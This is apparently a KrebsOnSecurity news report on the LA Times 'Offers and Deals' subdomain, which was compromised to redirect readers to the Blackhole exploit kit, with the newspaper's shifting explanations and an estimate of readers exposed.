The Los Angeles Times has scrubbed its Web site of malicious code that served browser exploits and malware to potentially hundreds of thousands of readers over the past six weeks.
On Feb. 7, KrebsOnSecurity heard from two different readers that a subdomain of the LA Times’ news site (offersanddeals.latimes.com) was silently redirecting visitors to a third-party Web site retrofitted with the Blackhole exploit kit. I promptly asked my followers on Twitter if they had seen any indications that the site was compromised, and in short order heard from Jindrich Kubec, director of threat intelligence at Czech security firm Avast.
Kubec checked Avast’s telemetry with its user base, and discovered that the very same LA Times subdomain was indeed redirecting visitors to a Blackhole exploit kit, and that the data showed this had been going on since at least December 23, 2012.
Contacted via email, LA Times spokeswoman Hillary Manning initially said a small number of users trying to access a subdomain of the site were instead served a malicious script warning on Feb. 2 and 3. But Manning said this was the result of a glitch in Google’s display ad exchange, not a malware attack on the company’s site.
“The LA Times, along with dozens of other Google ad exchange users including the New York Times, the Guardian, CNET, Huffington Post and ZDNet, were, to varying degrees, blocked by malicious script warnings,” Manning wrote in an email to KrebsOnSecurity. “The impacted sections of our site were quickly cleared and there was never any danger to users.”
Unfortunately, Avast and others continued to detect exploits coming from the news site. Manning subsequently acknowledged that the Google display ad issue was a separate and distinct incident, and that the publication’s tech team was working to address the problem.
It’s not clear how many readers may have been impacted by the attack, which appears to have been limited to the Offers and Deals page of the latimes.com Web site. Site metrics firm Alexa.com says this portion of the newspaper’s site receives about .12 percent of the site’s overall traffic, which according to the publication is about 18 million unique visitors per month. Assuming the site was compromised from Dec. 23, 2012 through the second week in February 2013, some 324,000 LA Times readers were likely exposed to the attack.
Security experts warn that the LA Times incident is unfortunately all-too-common. A report released this week by security and antivirus firm Sophos found that 80 percent of the Web sites where the company detects malicious content are innocent, legitimate sites that have been hacked.
Unlucky visitors who are browsing the hacked page with outdated plugins will have their PCs infected with malware of the attacker’s choosing.
The LA Times attack highlights the daily security challenges facing Web site owners and Internet users. Keeping your browser and operating system up-to-date with the latest patches is a great start, but it’s not enough to keep you safe on the Web today.
Update, 1:17 p.m. ET: In response to this story, The Los Angeles Times just released the following statement: “On February 6th the Los Angeles Times was made aware that malware was possibly being served by OffersandDeals.latimes.com. We quickly determined the problem was contained within the Offers & Deals sub-domain, which is maintained by a third party. Our forensics team undertook what is now an ongoing investigation and is working closely with the vendor to collect evidence surrounding the event. To ensure safety, the Offers & Deals platform has been rebuilt and further secured. The sub-domain generates only advertising content and does not contain any customer information. As a trusted source of news and information, The Times takes matters of internet security very seriously and are pleased to report that there is no malware currently detectable on Offers & Deals.”